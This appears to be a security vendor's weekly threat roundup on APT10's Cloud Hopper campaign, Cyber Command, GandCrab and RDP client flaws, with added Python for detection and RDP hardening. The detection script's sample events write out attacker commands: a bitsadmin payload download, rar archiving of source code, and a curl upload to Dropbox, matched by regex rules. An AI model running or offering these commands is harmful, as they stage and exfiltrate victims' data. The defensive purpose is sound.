This week we learn about APT10’s modus operandi in Operation Cloud Hopper, how U.S. Cyber Command plans to respond to such foreign campaigns, GoDaddy DNS server’s wild ride with GandCrab, and 16 major RDP vulnerabilities.
More details on Stone Panda’s (APT10) Cloud Hopper
A cyber-espionage campaign targeting at least three companies in the United States and Europe between November 2017 and September 2018 was brought to light in data published by Recorded Future and Rapid7. Based on the technical data discovered, the researchers assess with high confidence that these incidents were conducted by APT10 (also known as Stone Panda or CVNX) in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage.
The targeted companies include:
- An IT and business cloud services managed service provider (MSP)
- An international apparel company
- A U.S. law firm with strong experience in intellectual property law with clients in the pharmaceutical, technology, electronics, biomedical, and automotive sectors, among others
In all three incidents, the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials. We see once again how dangerous password reuse and/or the lack of two-factor authentication can be.
The attackers then enumerated access and conducted privilege escalation on the victim networks, utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware.
During the Visma intrusion, APT10 deployed RedLeaves malware with command and control (C2) communications encrypted using both RC4 and Salsa20 streaming ciphers. On the two other victim networks, the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor, only used by APT10. The backdoor was deployed using the Notepad++ updater and sideloading of a malicious DLL, as noted in APT10’s targeting of Japanese corporations in July 2018.
The attackers transferred malware and tooling from their C2 using BITSAdmin-scheduled tasks into the ‘C:\ProgramData\temp’ directory on the victim networks. APT10 actors then compressed proprietary data from Visma with WinRAR (deployed by the attackers) and exfiltrated it to Dropbox using cURL. The same Dropbox account was accessed by the attackers during the apparel company intrusion. Dropbox was also used to store exfiltrated documents from the third victim, the U.S. law firm, with the files again exfiltrated using identical TTPs and uploaded using cURL for Windows.
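The staging chain described above (BITSAdmin download into C:\ProgramData\temp, WinRAR archiving, cURL upload to Dropbox) is easy to hunt for in process-creation telemetry. The following is an added example, not code from the original post or from either research team; the Sysmon-style events, host names and command lines are constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 http://198.51.100.7/u.dat C:\ProgramData\temp\u.dat"},
    {"host": "ws01", "image": r"C:\ProgramData\temp\rar.exe",
     "cmdline": r'rar.exe a -hp"pass" C:\ProgramData\temp\out.rar D:\Projects\src'},
    {"host": "ws01", "image": r"C:\ProgramData\temp\curl.exe",
     "cmdline": r"curl.exe -X POST https://content.dropboxapi.com/2/files/upload -T C:\ProgramData\temp\out.rar"},
    {"host": "ws02", "image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
     "cmdline": r"curl.exe https://example.com/index.html"},  # benign: no Dropbox, no upload
]

# One regex per stage of the chain the post describes. Each matches on the command line only,
# so renamed binaries that keep the same arguments are still caught.
RULES = {
    "bitsadmin_to_programdata_temp": re.compile(
        r"bitsadmin(\.exe)?\s+/transfer.*C:\\ProgramData\\temp", re.I),
    "winrar_archiving": re.compile(r"(^|\\)(win)?rar(\.exe)?\s+a\s", re.I),
    "curl_upload_to_dropbox": re.compile(
        r"curl(\.exe)?.*dropbox.*(-T|--upload-file|-F|-X\s+POST|--data)", re.I),
}


def classify(event):
    """Return the names of all rules whose pattern matches this event's command line."""
    return [name for name, rx in RULES.items() if rx.search(event["cmdline"])]


def detect(events):
    """Flatten events into (host, rule_name) hits."""
    return [(e["host"], name) for e in events for name in classify(e)]


def correlate(events):
    """Hosts on which every stage (download, archive, upload) was observed; sorted list."""
    by_host = {}
    for host, name in detect(events):
        by_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in by_host.items() if names == set(RULES))


if __name__ == "__main__":
    for host, name in detect(SAMPLE_EVENTS):
        print(f"{host}: {name}")
    print("full chain on:", correlate(SAMPLE_EVENTS))
```

Any single stage is worth an alert on its own; a host that trips all three within a short window is a strong exfiltration signal.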
APT10 is believed to be the most significant Chinese state-sponsored cyber threat to global corporations known to date. APT10 has conducted a number of operations since 2016, and we now know they are run by the Chinese intelligence agency, the Ministry of State Security (MSS).
Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd, the MSS has conducted “Operation Cloud Hopper” against managed IT service providers (MSPs), designed to steal intellectual property and enable secondary attacks against their clients. Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds, if not thousands, of corporations around the world. APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks, not of stealing Visma’s own intellectual property.
In all three incidents, APT10 actors used previously acquired legitimate credentials (possibly gained via a third-party supply chain compromise) in order to gain initial access to the law firm and the apparel company.
Transformational hacking moment for U.S. Cyber Command
On February 6, 2019, RealClear released a report on a new, more aggressive strategy to take down cyber actors in response to the high-profile attacks on the United States. And they’re no longer just playing defense.
Gen. Paul Nakasone, commander of U.S. Cyber Command, described a “transformational moment” in how the U.S. conducts cyber operations, aimed at raising the costs adversaries incur from attacking the United States. Nakasone did not reveal what the new strategy is; however, he stated that it involves targeting the infrastructure of adversary cyber actors, hurting their ability to target American interests in the virtual world. Nakasone referenced an operation against ISIS by Joint Task Force Ares to take down the group’s communications and propaganda tools.
Nakasone also revealed a partnership between the U.S. Cyber Command and the NSA which helped to secure the 2018 midterm elections against Russian interference. U.S. Cyber Command learned that techniques and tradecraft must evolve to keep pace with adversaries. No indicators of compromise were released with the report.
GandCrab smash and grab with GoDaddy’s help
A large-scale GandCrab ransomware campaign was assisted by a security hole in GoDaddy’s DNS. GandCrab is a common ransomware family discovered in 2018. Researchers noticed that the exploit was being executed through a compromised DNS system to launch attacks. Once executed, the actors deliver GandCrab ransomware to the compromised target system. Researchers disclosed two phishing email themes used in this campaign: DHL Delivers and E-fax messages. We checked over the last 30 days. We saw a few organizations receive these emails. If you were affected, we have reached out to you.
So many RDP vulnerabilities!
Check Point researchers have discovered 25 vulnerabilities, 16 of them critical, in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication: a malicious RDP server can infect the computer of the client that connects to it. This infection would allow for an intrusion into the client’s network as a whole. And yes, our data confirms that many organizations still allow access to RDP from the outside world.
I can imagine a scenario where someone hijacks the DNS for your RDP servers and infects all the clients that try to connect. But this would be cool for a hack-back honeypot too. Which reminds me of Wes’ blog post on forcing the pain back to the bad guys.
In one of the vulnerabilities, when a client uses the “copy & paste” feature while connected to a malicious RDP server, the server can use the shared RDP clipboard to send files to the client’s computer.
As described by the research team, a potential attacker could use this vulnerability in the Remote Desktop Connection to drop arbitrary malicious scripts or programs to a user’s Startup folder, which would be automatically executed during the next reboot of the client computer.
This did not meet the bar for acknowledgement by Microsoft, and no patch is planned. Check Point researchers recommend that you turn off the shared RDP clipboard (clipboard redirection) while using RDP.
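Clipboard redirection is controlled per connection by the `redirectclipboard:i:<0|1>` line in a saved .rdp file, so it can be audited and switched off in bulk. The following is an added example, not code from the original post or from Check Point; the sample .rdp content is constructed, and the assumption that a missing key means redirection is on (mstsc’s default) is noted in the code.

```python
# Constructed sample .rdp connection file in the mstsc "key:type:value" format (not from the post).
SAMPLE_RDP = """screen mode id:i:2
full address:s:rds01.example.internal
redirectclipboard:i:1
drivestoredirect:s:
authentication level:i:2
"""


def parse_rdp(text):
    """Parse an .rdp file into an ordered list of (key, type, value) triples."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        # Values may themselves contain ':' (e.g. IPv6 hosts), so split at most twice.
        key, typ, value = line.split(":", 2)
        entries.append((key, typ, value))
    return entries


def clipboard_enabled(text):
    """True if this connection would share the clipboard with the server."""
    settings = {k: v for k, _, v in parse_rdp(text)}
    # Assumption: when the key is absent, mstsc defaults to clipboard redirection on.
    return settings.get("redirectclipboard", "1") != "0"


def harden_rdp(text):
    """Return the file with clipboard redirection forced off, other settings untouched."""
    out, seen = [], False
    for key, typ, value in parse_rdp(text):
        if key == "redirectclipboard":
            out.append((key, "i", "0"))
            seen = True
        else:
            out.append((key, typ, value))
    if not seen:
        out.append(("redirectclipboard", "i", "0"))
    return "\n".join(f"{k}:{t}:{v}" for k, t, v in out) + "\n"


if __name__ == "__main__":
    print("clipboard on:", clipboard_enabled(SAMPLE_RDP))
    print(harden_rdp(SAMPLE_RDP))
```

Run `harden_rdp` over every .rdp file your helpdesk hands out (and re-check after users edit them, since the mstsc GUI writes the key back when the box is re-ticked).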